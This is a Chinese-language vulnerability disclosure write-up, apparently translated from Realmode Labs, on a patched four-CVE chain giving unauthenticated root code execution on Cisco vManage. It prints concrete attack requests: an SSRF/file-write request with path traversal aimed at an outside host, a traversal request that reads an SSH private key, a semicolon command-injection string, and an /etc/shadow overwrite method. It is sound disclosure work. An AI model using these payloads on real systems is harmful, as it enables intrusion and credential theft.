思科vManage漏洞分析：四漏洞链实现未授权远程代码执行

SD-PWN — 第3部分 — Cisco vManage — 又一天，又一次网络接管

这是四部分系列中的第三篇文章，前两部分请参阅：

• 第1部分 — Silver Peak Unity Orchestrator
• 第2部分 — Citrix SD-WAN Center

本文继续我们的SD-WAN之旅。如果您还没有阅读第1和第2部分，强烈建议您查看一下。简而言之，我们在SD-WAN市场的四个主要产品中发现了关键的无认证RCE漏洞，这次我们将讨论Cisco Viptela vManage。

Cisco Viptela vManage

Cisco Viptela vManage是Cisco SD-WAN基础设施的核心，管理网络中的所有不同端点。由于SD-WAN设计的集中式特性，从安全角度来看，vManage是一个单点故障。

通过串联4个不同的漏洞，我们能够在vManage机器上获得无认证的root权限RCE，这些机器通常托管在公司的云环境中。攻击者不需要任何先前的配置知识即可利用这些漏洞。

如果您的组织使用Cisco的Viptela SD-WAN解决方案，请紧急更新您的设备。最新的固件已经包含了下面列出的所有问题的补丁。

技术细节

系统的初始攻击向量是运行在vManage机器443端口上的Web管理服务器。该Web服务器使用JBoss框架运行Java小程序。Web管理接口的无认证攻击面在web.xml文件中列出，明确定义了所有可访问的URL路径。

SSRF + 任意文件写入 — CVE-2020–27128

在查看可能的入口点时，我们注意到了/dataservice入口点。我们不确定代码的确切意图，但我们的假设是不同的端点使用dataservice URL共享数据和统计信息。

/dataservice/statistics/download/dr/filelist处理程序负责下载系统中两台机器之间的统计信息。它接收相邻机器的IP地址和统计文件名，并下载以供后续使用。

完全没有进行用户输入验证，导致了多个漏洞。首先，任何IP都可以通过sourcevManageIp参数传递给处理程序，允许进行SSRF攻击。其次，token和fileType参数中的目录遍历允许攻击者将上述数据下载到任何目标路径，甚至可以覆盖现有文件。

服务器以vmanage用户身份运行，允许覆盖一些有趣的文件。

此外，该处理程序没有受到任何CSRF机制的保护。

POST /dataservice/statistics/download/dr/filelist HTTP/1.1
Host: 192.168.100.2:8443
Content-Length: 210
Origin: https://192.168.100.2:8443
Content-Type: application/json{"queue":0, "fileType":"/../../../../../../../tmp/", "deviceIp":"", "sourcevManageIp":"1.2.3.4:12345", "fileList" : [{"file" : "droppeb.bin", "token":"../../../../../../../../../../../"}]}

将导致服务器GET以下路径：

https://1.2.3.4:12345/dataservice/statistics/download/remoteprocessing/file/../../../../../../../dropped.bin

并将文件内容写入/opt/data/app-server/statistics/queue-0//../../../../../../../tmp/dropped.bin。

尽管这是一个可能被利用到RCE的关键漏洞，但它不是最终利用链的一部分。

未授权文件读取 + 目录遍历 — CVE-2020–26073

在上面的处理程序旁边，我们注意到另一个有趣的处理程序 — /dataservice/disasterrecovery/download/token/。

它接收一个参数 — 要读取的文件...再次，没有执行用户输入验证，允许进行易于利用的目录遍历。攻击者能够读取vManage用户可访问的任何文件。

GET /dataservice/disasterrecovery/download/token/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2Fetc%2Fviptela%2F.ssh%2Fid_dsa HTTP/1.1
Host: 192.168.100.2:443

将读取/etc/viptela/.ssh/id_dsa的内容。

SSH密钥

/etc/viptela/.ssh/id_dsa是用于SSH连接的秘密私钥，具有vmanage用户权限即可读取。它允许攻击者以vmanage-admin身份通过SSH连接。

vmanage-admin的登录二进制文件是viptela_cli，就像admin一样，尽管vmanage-admin无法访问常规的CLI控制台。这是在viptela_cli的main函数中决定的，该函数验证用户名。否则，用户可以通过SSH连接发送单个命令，这提供了一些攻击面。

viptela_cli中的命令注入 — CVE-2020–27129

使用上述SSH密钥登录后，viptela_cli解析用户提供的命令。通过SSH连接发送的任何命令在执行前都会经过验证。

通常只允许以scp -f开头的命令。不幸的是，对命令的其余部分没有执行任何清理，允许攻击者使用分号注入另一个命令。

scp -f -h; touch /tmp/exploit;

上面的命令将以vmanage-admin用户身份运行。

使用busybox.suid进行权限提升 — CVE-2020–26074

在寻找系统中提升权限的不同选项时，我们注意到了一个特殊的suid文件 — busybox.suid。文件系统中的SUID位将在每次执行时将二进制文件的权限提升为root。busybox.suid允许以root身份运行多个busybox小程序。

一个有趣的小程序是tftp，它允许使用tftp协议向系统上传和下载文件。没有对目标路径进行验证，使恶意用户能够以root身份用任何给定数据覆盖任何文件。这使得攻击者能够完全控制系统。

一个基本的例子是用新的root密码覆盖/etc/shadow文件，然后简单地运行su来获得root访问权限。

完整RCE利用链

1. 使用目录遍历漏洞读取vmanage-admin的私有SSH密钥
2. 通过SSH登录并注入一个将运行权限提升的命令
3. 使用busybox.suid的tftp小程序覆盖/etc/shadow
4. 运行su命令获得root命令执行

请注意，这只是利用这些漏洞的一种方式。可能会找到其他可能更简单的利用链。

时间线

Realmode Labs要感谢Cisco及其PSIRT在报告和修复这些漏洞过程中的出色沟通。

• 2020-07-31 — Realmode Labs向Cisco PSIRT发送初始报告
• 2020-07-31 — Cisco PSIRT确认报告，分配经理
• 2020-11-02 — Cisco PSIRT分配CVE编号，发布修复软件
• 2020-11-04 — 发布安全公告和CVE
• 2020-11-23 — 本报告发布

请确保在LinkedIn上关注我们，或通过contact@realmodelabs.com联系我们，以获取下一个SD-PWN漏洞帖子。

如果您有兴趣对您的某个产品进行安全审计，请联系我们。我们的团队由最高水平的研究人员组成，在发现最难以捉摸的漏洞方面有着良好的记录。

参考资料

漏洞1 — SSRF + 任意文件写入 — CVE-2020–27128
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-vmanage-file-Y2JSRNRb

漏洞2 — 未授权文件读取 + 目录遍历 — CVE-2020–26073
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-vman-traversal-hQh24tmk

漏洞3 — viptela_cli中的命令注入 — CVE-2020–27129
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-vmanage-privilege-zPmMf73k

漏洞4 — 使用busybox.suid进行权限提升 — CVE-2020–26074
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-vmanage-escalation-Jhqs5Skf
更多精彩内容 请关注我的个人公众号 公众号（办公AI智能小助手）
对网络安全、黑客技术感兴趣的朋友可以关注我的安全公众号（网络安全技术点滴分享）

公众号二维码

公众号二维码